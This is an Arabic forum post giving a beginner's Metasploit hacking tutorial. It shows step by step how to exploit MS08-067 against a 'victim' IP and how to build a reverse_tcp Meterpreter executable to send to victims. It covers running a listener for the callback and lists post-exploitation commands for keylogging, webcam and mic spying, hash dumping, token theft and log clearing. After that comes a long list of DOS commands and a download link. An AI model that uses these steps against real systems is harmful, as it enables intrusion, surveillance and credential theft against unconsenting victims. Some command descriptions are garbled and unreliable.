الشرح الشامل حول الميتاسبلويت métasploit
- أسم المشروع : m3taspl0it
- الترخيص : free,14 day trial
- الموقع الرسمي : m3taspl0it
- مهمة المشروع : اختراق الاجهزة عبر الثغرات , عبر البايلودات , وأكثر
- تعريف بالمشروع : مشروع m3taspl0it صدر عام 2003 تحتوي الاداه على
مجموعة من الثغرات وصلت الي 1333 في الاصدار الاخير
ومجموعة بايلودات وصلت الي 340 ويمكن ايضا اضافة بعض الثغرات الجديدة للاداه
حصدت هذه الاداه شهرة كبير نظا للتطور الكبير الحادث لها مما جعل الكثير من الهكرز
يتوجهون اليها فهي تستخدم في العديد من المجالات وتعتبر من اهم الادوات في الاختراق عامه
وتم تصنيفها من اهم 10 ادوات على توزيعه Kali Linux
ثم تم تحديث الاداه بتاريخ 10-9-2014 الي ..
1349 exploit اي ما يعني 16 exploit جديدة
822 auxiliary اي ما يعني 100 auxiliary جديدة
228 post اي ما يعني 14 post جديدة
وثبت عدد كل من payloads , encoders , nops
340 payloads
35 encoders
8 nops
ثم تم التحديث مجددا يوم 25-9-2014 الي
1354 exploits
826 auxiliary
231 post
340 payloads
35 encoders
8 nops
مما يعني
5 exploit جديدة
4 auxiliary جديدة
3 post
وثبت كل من
payloads
encoders
nops
-صورة قديمة من الاداه :
صورة حالية من الاداه :
الاداه موجود بها اقسام منها :
msfconsole الرئيسية وهي الاداه حيث نضع الادوات واستغلال الثغرات والتنصتبعض الاوامر المهمة والتي يجب تعلمها :
msfpayload اداة البايلودات لتكوين البايلودات
msfencode اداة التشفير خاصة بالاداة
msfgui واجهه رسومية قديمة تم استبدالها باداه Armitage
show exploits
عرض الثغرات
show payloads
عرض البايلودات
use windows/smb/ms08_067_netapi
استخدم هذه الثغرة windows/smb/ms08_067_netapi
show options
عرض الاعدادات
set LHOST 192.168.1.150
ضع الاي بي الخاص بي 192.168.1.150
set LPORT 445
ضع البورت الخاص بي 445
set RHOST 212.150.13.109
ضع اي بي الضحية 212.150.13.109
set RPORT 445
ضع بورت الضحية 445
set PAYLOAD windows/meterpreter/reverse_tcp
ضع البايلود windows/meterpreter/reverce_tcp
exploit
استغل
وهذه بعض الاوامر المهمة لتكوين بايلود
حيث امر تكوين البايلود هو
كود:
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.150 lport=445 x > th3genius.exe
msfpayload
اداه تكوين البايلودات في مشروع m3taspl0it
windows/meterpreter/reverse_tcp
البايلود الذي سوف نستخدمه
lhost=192.168.1.150
الاي بي الخاص بي هو 192.168.1.150
lport=445
البورت الخاص بي هو 445
x
اختصار لـنوع البايلود exe
<
يلية اسم البايلود
th3genius.exe
اسم البايلود
اختصارات انواع البايلودات
S --> Summary
H --> Csharp
P --> Perl
Y --> Ruby
R --> Raw
J --> Js
X --> exe
D --> dll
V --> VAB
W --> War
N --> Python
بعد تنفيذ هذا الامر سوف تجد البايلود في المسار الذي تتواجد عليه
يعني مثلا اذا انت حطيت الامر cd Desktop
وهو امر الدخول الي الديسك توب ثم وضعت امر عمل البايلود
سوف تجد البايلود على الديسك توب
اوامر التنصت على البايلود
طبعا بعد ان قمنا بعمل بايلود وارسالة للضحية يجب تشغيل استغلال البايلود
عندنا حتى يصلنا التبليغ
نقوم بفتح msfconsole عن طريق كتابة اسمها في الطرفية (الترمنال)
ثم نضع الامر التالي
use exploit/multi/handler
وهذا الامر ثابت في التنصت
ثم نضع الاوامر set LHOST , set LPORT
وطبعا نضع الاي بي الخاص بنا والبورت (نفس اللي استخدمناهم في عمل البايلود)
ثم نضع الامر set PAYLOAD
ويلية البايلود الذي استخدمناه
ثم نضع
exploit
وهكذا بمجرد ان يفتح الضحية البايلود سوف يصلك التبليغ
ونتوجه من اوامر الاختراق الي اوامر التحكم بالضحية
عن طريق الـ meterpreter
-الاوامر :
1-bgkill قفل برامج الضحية
2-bglis البرامج الى شغالة عند الضحية
3-exit للخروج
4-help للمساعدة
5-info استخراج معلومات
6-migrate للعب بالبروسسر و تنقل الباك دور
7-read للقراءة
8-run لتشغيل برامج الضحية
9-use استخدام اى شي
10-cat لقراءة ملفات التكست
11-cd لتتنقل فى جهاز الضحية
12-del لحذف مجلد
13-download لتحميل من جهاز الضحية
14-edit اعادة تسمية
15-upload لرفع الى الضحية
16-clearev الاحداث فى جهاز الضحية
17-getprivs امتيازات كتيرة
18-kill لتقل عمليات البروسسر
19-ps لعرض البروسسرة
20-reboot اعادة تشغيل جهاز الضحية
21-reg لتشغيل جهاز الضحية
22-****************l لفتح الدوس الخاص بالضحية
23-shutdown قفل جهاز الضحية
24-steal_token لسرقة الرموز
25-sysinfo جميع معلومات جهاز الضحية
26-enumdesktops للتجسس على باقى اجهزة الشبكة
27-getdesktop سطح مكتب الضحية
28-idletime مراجعة
29-keyscan_dump تنصت الكيلوجر
30-keyscan_start لتشغيل الكيلوجر
31-keyscan_stop ايقاف الكيلوجر
32-screenshot تصوير شاشة الضحية
33-uictl ايقاف موس و كيبودر الضحية
34-record_mic استماع مايك الضحية
35-cam_list فتح كام الضحية
36-cam_snap رقم الكاك
37-hashdump استخراج الهاش من جهاز الضحية
وطبعا اذا نفذت الامر رقم 22 راح تحتاج الي اوامر الـ CMD
اوامر الدوس
1ــ الأمر CLS
وظيفته : مسح محتويات شاشة الدوس
صيغته :
C:\>CLS
2ــ الأمر DIR
وظيفته : استعراض محتويات فولدر أو درايف
صيغته :
C:\>DIR
لتصفح محتويات القرص C أما اذا اردنا تصفح محتويات القرص D فنكتب :C:\>DIR D
C:\>DIR/P
للاستعراض المتقطع (صفحة صفحة)..وسيكون لزاما عليك أن تضغط على أي مفتاح بالكيبورد لاستكمال عملية الاستعراض
C:\>DIR/W
لاستعراض اسماء الملفات و الفولدرات فقط دون التطرق لأي معلومات عنها.
C:\>DIR/A
لاستعراض الملفات .. و الملفات الخـفية (المعدنة)
C:\>DIR/S
لاستعراض الملفات .. و الفولدرات وما تحتوي هذت الفولدرات من ملفات
C:\>DIR\S
لعرض السيريال نمبر للقرص .. لاحظ اختلاف العلامة من ( / ) إلى ( \ )
C:\>DIR/D
لاستعراض الفولدرات فقط
3ــ الأمر CD
وظيفته : التنقل بين الفولدرات المختلفة
صيغته:
C:\>CD WINDOWS
للتنقل بين الدرايفات .. اكتب فقط رمز القرص و يلية نقطتان رأسيتان
:C:\>A
و بهذا ننتقل للمحرك A
4ــ الأمر COPY
وظيفته : نسخ محتويات ملف أو مجموعة ملفات
صيغته :
C:\>COPY F:\GAMES B:\FUN
سيقوم الحاسب بنسخ جميع الملفات ( لاحظ ..الملفات فقط ) الموجودة بالفولدر المسمى GAMES الموجود بالدرايف F آلي الفولدر FUN الموجود بالدرايف B
5ــ الأمرXCOPY
وظيفته : نسخ فلوبي ديسك الى فلوبي ديسك آخر
صيغته :
:C:\>XCOPY A: J
سيقوم الكمبيوتر تحتوي الأمر السابق بنسخ محتويات الفلوبي ديسك A الى الفلوبي ديسك J
و يشبه كثيرا الأمر Cpoy
6ــ الأمر MOVE
وظيفته : يقوم بعملية نقل للملفات من مكان آلي آخر وهو يساوي الأمر Cut تحتوي نظام الوندوز
صيغته :
B:\>MOVE C:\KING\*.GIF F:\BOSS
تحتوي المثال السابق سيقوم الكمبيوتر بتنفيذ الأمر حيث سينقل جميع الملفات ذات الامتداد
GIF والموجودة بفولدرKING الموجود بالـC الى الفولدر BOSS الموجود بالـF
7ــ الأمرFORMAT
وظيفته : مسح جميع البيانات الموجودة على درايف معين ومن ثم إعادة تشكيل قطاعات وفهارس.
صيغته :
:C:\>FORMAT F
آما الصيغ الأخرى فهي كالتالي :
:C:\>FORMAT/Q F
وذلك لعمل فرمته سريعة.. وهذا هو المستحب غالبا
:C:\>FORMAT/S F
لعمل فرمته مع نقل ملفات النظام
:C:\>FORMAT/U/Q F
لعمل فرمته سريعة مع عدم إمكانية استعادة الملفات المحذوفة
8ــ الأمرMD والأمر MKDIR ( الأمرين يؤديان نفس الغرض )
وظيفته : إنشاء فولدر جديد( مجلد جديد ) و بالطبع سيكون هذا الفولدر تحتوي بداية الأمر فارغ.
صيغته :
C:\>MD F:\PHOTO
سيقوم الكمبيوتر تحتوي الأمر السابق بإنشاء فولدر جديد اسم PHOTO وذلك بداخل الدرايف F .
9ــ الأمرREN
وظيفته : إعادة تسمية الملفات والفولدرات.
صيغته ( في حالة الفولدر ) :
C:\>REN B:\GAMES PLAYS
سيقوم الكومبيوتر في الأمر السابق بتغيير اسم الفولدر المدعو GAMES إلى PLAYS .
صيغته ( في حالة الملف ) :
C:\>REN F:\MEDO.MPG AHMED.MPG
سيقوم الكومبيوتر في الأمر السابق بتغيير اسم الملف المدعو MEDO إلى AHMED مع ملاحظة ان امتداد الملف MPG في هذا المثال لا تتغير .
10ــ الأمرDEL
وظيفته : إلغاء ملف أو مجموعة ملفات
صيغته :
C:\>DEL B:\*.GIF
سيقوم الحاسب في العملية السابقة بمسح جميع الملفات المشتركة في الامتداد .GIF
والمتواجدة بالدرايف B
11ــ الأمر DELTREE
وظيفته : إلغاء فولدر ما بجميع محتوياته.. و جعله فارغا...أو إلغائه هو نفسه بمحتوياته.
صيغته:
C:\>DELTREE F:\GAMES
سيقوم الكمبيوتر بإلغاء ومسح الفولدرGAMES من الدرايف B
أما إذا كنت تريد تفريغ الفولدرGAMES من محتوياته دون إلغائه هو نفسه .. فالصيغة الآتية تفي بالغرض.
*.*\C:\>DELTREE/y F:\GAMES
ملاحظات :
* يستخدم البعض أمرDELTREE للتخلص من نسخة الوندوز العاملة على أجهزتهم وذلك لتجنب الفرمتة.
* الفرق بين الأمر DEL والأمرDELTREE هو أن الأول يستخدم للتخلص من الملفات فقط بينما الثاني يستخدم للتخلص من الملفات والفولدرات معا.
12ــ الأمر DATE
وظيفته : يقوم بعرض التاريخ المستخدم حاليا بالجهاز .. و إمكانية التعديل فيه.
صيغته :
C:\>DATE
13ــ الأمر TIME
وظيفته : عرض التوقيت الحالي بالجهاز و إمكانية التعديل فيه.
صيغته:
C:\>TIME
14ــ الأمرCHKDSK
وظيفته: يعرض معلومات جيدة عن درايف معين تقوم بتحديده.
صيغته:
:C:\>CHKDSK D
يقوم الكمبيوتر بعرض معلومات عن الدرايف مثل الرقم المسلسل Serial Number
والمساحة الكلية و أشياء أخرى .
15ــ الأمرSCANDISK
وظيفته : يقوم بعلاج الأخطاء التي قد تحدث للملفات على الدرايف و إعطاء تقرير نهائي عن ذلك.
صيغته :
:C:\>SCANDISK F
يعالج الكمبيوتر الأخطاء بالدرايف F ويعطى تقرير بحالة الدرايف بعد الـSCAN
16ــ الأمرRD
وظيفته : إلغاء و مسح فولدر فارغ
صيغته :
C:\>RD F:\GAMES
يقوم الكمبيوتر بإلغاء الفولدر الفارغ GAMES .. و يلاحظ في هذا الأمر انه يجب أن ينفذ على الفولدرات الفارغة فقط .. وعندما نقول الفارغة فإننا نعنى بها الفارغة من الملفات والفولدرات معا.
17ــ الأمر LABEL
وظيفته : تغيير اسم الدرايف
صيغته :
C:\>LABEL B: KING
سيقوم الكمبيوتر بتغيير اسم الدرايف C من الاسم السابق إلى الاسم الجديد.
18ــ الأمرFDISK
وظيفته : يقوم هذا الأمر بإعادة تقسيم الهارد ديسك
صيغته :
:C:\>FDISK C
هذا الأمر من اخطر الأوامر حيث انه يقوم بإعادة تقسيم الهارد ولا ينصح باستخدامه إلا من قبل المتخصصين.
19ــ الأمر ATTRIB
وظيفته : تغيير خصائص الملفات
صيغته : لهذا الأمر عدة صيغ وهي على النحو التالي :
إذا أردت أن تجعل ملف قابل للكتابة فقم بإعطائه الرمز-r أما إذا أردت أن تجعله غير قابل للكتابة فيه فقم بإعطائه الرمز +r و المثال التالي يشرح الأمر
C:\>ATTRIB +r C:\EGY.TXT
في المثال السابق جعلنا الملف المسمى EGY.TXT للقراءة فقط أي read only
وهناك خاصيتان آخريتان هما .. خاصية الإخفاء hidden وخاصية الـArchive ويمكن أيضا التغيير فيهما باستخدام الـ + أو الـ -
وخاصية الـ hidden تأخذ الرمز h و خاصية الـ Archive تأخذ الرمز s
والمثالان الآتيان يشرحان الأمر.
لجعل نفس الملف السابق مخفيا
C:\>ATTRIB +h C:\EGY.TXT
لجعل نفس الملف السابق ملف نظام
C:\>ATTRIB +S C:\EGY.TXT
20ــ الأمر DEFRAG
وظيفته: ترتيب الملفات على القرص الصلب
صيغته:
:C:\>DEFRAG F
عملية ترتيب الملفات هذه تأخذ وقت طويل( و تعتمد على قوة جهازك )
ملاحظة :
هذا الأمر لا يعمل إلا مع برنامج الدوس الملحق بالوندوز أي انك لا تستطيع تنفيذه من خلال الـStartup Disk .
21ــ الأمرPROMPT
وظيفته : تغيير شكل محث الدوس.
صيغته :
C:\>PROMPT MEDO
هذا الأمر يفيدك إذا كنت من محبي الفنون التشكيلية ولا تحبذ الشكل التقليدي للمحث
وفي المثال السابق سيغير الكمبيوتر شكل المحث ليصبح كما في الشكل الآتي :
MEDO>
22ــ الأمرMEM
وظيفته : عرض معلومات عن الذاكرة
صيغته:
C:\>MEM
يقوم هذا الأمر بعرض معلومات عن الذاكرة والجزء المستخدم منها في الوقت الحالي ووو
23ــ الأمر SYS
وظيفته : نقل ملفات النظام إلى درايف معين تختاره أنت.
صيغته:
:C:\>SYS B
سيقوم الكمبيوتر بنقل ملفات النظام إلى الدرايف B .
ملاحظة :
هذا الأمر لا يمكنك استخدامه إلا مع نظام الدوس الموجود على الـSTARTUP DISK ولا يمكنك استخدامه مع الدوس الملحق بالوندوز .
kuwaitilove
09-09-2004, 03:06 PM
24ــ الأمر TYPE
وظيفته : فتح ملف نصي
صيغته :
C:\>TYPE F:\GAMES\FORCE.TXT
لا أبالغ إذا قلت أن هذا الأمر من أهم أوامر نظام الدوس حيث انه يسمح لك بالدخول و الكتابة في ملفات قد لا تستطيع الكتابة فيها أثناء عملك في الوندوز لان هذه الملفات ساعتها تكون قيد الاستخدام من قبل نظام الوندوز.
وفي المثال السابق سيقوم الأمر بفتح الملف المسمىFORCE.TXT والموجود بالفولدرGAMES الموجود أيضا بالدرايفF وبعد فتحك للملف تستطيع أن تعدل فيه وتغير من خصائصه .
ولكن أحيانا .. تخرج لك رسالة تقول لك أن هذا الملف للقراءة فقط .. طبعا أنت الآن والحمد لله تعرف ما هو الحل .. يجب عليك ساعتها استخدام الأمر ATTRIB لتغيير خصائص الملف..وذلك بان تستخدم -r مع الأمرATTRIB .
ملاحظة :
كل ما أقوله الآن عن الأمر TYPE يصلح فقط في الدوس الموجود على الـStartup Disk إما الدوس الملحق بالوندوز فهو يعرض محتوى الملف فقط .. أي انك تستطيع استخدام الأمر TYPE مع الدوس الملحق بالوندوز ولكن للعرض فقط.
25ــ الأمرEDIT
وظيفته : يقوم بفتح برنامج تحرير النصوص الملحق بالدوس
صيغته :
C:\>EDIT
تستطيع القول إن الأمر EDIT يقوم بفتح برنامج يساوي تقريبا برنامج الـNotepad في نظام الوندوز.. و من خلال برنامج التحرير الملحق بالدوس تستطيع فتح الملفات النصية.. و للعلم فالأمر السابقTYPE يستعين ببرنامج التحرير هذا في فتح الملفات النصية ..أي إن الأمرينTYPE و EDIT هما وجهان لعملة واحدة.
26ــ الأمر HELP
وظيفته : يقوم بفتح برنامج المساعدة الملحق بالدوس.
صيغته :
C:\>HELP
أولا هذا الأمر لا يصلح إلا في الدوس الموجود على الـStartup Disk .
أما الدوس الملحق بالوندوز فلا.
عند استخدامك لهذا الأمر .. سترى معلومات مفيدة جدا .
27ــ الأمر DISKCOPY
وظيفته : نسخ اسطوانة مرنة لأخرى مرنة أيضا
صيغته:
C:\>DISKCOPY A: G:
يقوم الجهاز بعمل نسخة طبق الأصل ( بما فيها من عيوب ) من الاسطوانة المرنة A إلى الاسطوانة المرنة G .
28ــ الأمرDISKCOMP
وظيفته : مقارنة اسطوانتين مرنتين وعرض نتيجة المقارنة على هيئة تقرير.
صيغته :
C:\>DISKCOMP A: G:
29ــ الأمر VER
وظيفته : معرفة رقم إصدار النظام.
صيغته:
C:\>VER
30ــ الأمر VOL
وظيفته : معرفة اسم والرقم المسلسلSerial Number لدرايف معين
صيغته :
C:\>VOL F:
سيقوم الكمبيوتر بعرض اسم الدرايف F وكذلك الرقم المسلسل الخاص به.
31ــ الأمر PROGMAN
وظيفته : الوصول إلى قائد البرامج في جهازك.
صيغته:
C:\>PROGMAN
هذا الأمر يعمل فقط في الدوس الملحق بالوندوز.
32ــ الأمرHWINFO/UI
وظيفته : معرفة معلومات عن النظام.
صيغته :
C:\>HWINFO/UI
لا يعمل إلا في الدوس الملحق بالوندوز.
33ــ الأمرTUNEUP
وظيفته : لتشغيل معالج الصيانة.
صيغته :
C:\>TUNEUP
هذا الأمر لا يعمل إلا في الدوس الملحق بالوندوز.
34ــ الأمر TELNET
وظيفته : تشغيل برنامج التلنيت الملحق بالوندوز.
صيغته :
C:\>TELNET
هذا الأمر لا يعمل إلا في الدوس الملحق بالوندوز.
و من داخله عدة أوامر كأمر فتح المواقع open و أمر الخروج من التلنيت quit
35ــ الأمرWINIPCFG
وظيفته : معرفة رقم الـ IP الخاص بك وأنت على الشبكة.
صيغته :
C:\>WINIPCFG
يستخدم هذا الأمر كما ترون لمعرفة رقم الآي بى الخاص بك وطبعا من البديهي أن هذا الأمر لا يعمل إلا وأنت على الإنترنت .. و كذلك لا يعمل إلا في الدوس الملحق بالويندوز
36 - أمر الخروج EXIT
بقية الأوامر .. امتنع عن ذكرها .. لما لها من أضرار تخريبية
كما لا ننسى بأنك بإمكانك تشغيل معظم برامج من الدوس :
لفتح لوحة التحكم اكتب Control
لفتح الحاسبة اكتب Calc
لفتح الرسام اكتب mspaint
لفتح المذكرة اكتب notepad
لفتح الحافظة وهي تحفظ آخر ما نقوم به من عمليات النسخ و القص اكتب clipbrd
لفتح برنامج تنظيف القرص اكتب Cleanmgr
لفتح برنامج تحويل القرص إلى FAT 32 اكتب Cvt1
لفتح برنامج إلغاء تجزئة القرص اكتب Defrag
لتشغيل برنامج تشغيل التخطي التلقائي اكتب الأمر asd
لتشغيل قارئ الأقراص المضغوطة اكتب cdplayer
لفتح مخطط توزيع الأحرف اكتب charmap
لتشغيل الاتصال المباشر بالكبيل اكتب directcc
لتشغيل برنامج ضغط الأقراص اكتب Drvspace
لفتح مستكشف ويندوز اكتب explorer
لتشغيل برنامج كوداك للصور المرفق مع الويندوز اكتب Kodakimg
و لتشغيل متصفحه اكتب Kodakprv
لتشغيل لعبة الكوبة اكتب Mshearts
لتشغيل لعبة Pinball اكتب pinball
لتشغيل لعبة سوليتير اكتب sol
لفتح لعبة " خلية حرة " اكتب free cell
لفتح لعبة " كانسة الألغام " اكتب Minesweeper
لفتح لوحة التحكم اكتب Control
لفتح الحاسبة اكتب Calc
طبعا انت هيك المفروض بتكون فهمت كل شيء عن m3taspl0it
ولكن فعليا هناك الكثير لتتعلمه فهذه تعتبر الاساسيات
تفضل هذا الكتاب عن m3taspl0it بالعربية
رابط تحميل الكتاب
http://www.mitghamronline.com/up/uploads/14112061061.zip
دمتم في رعاية الله
رد مع اقتباس
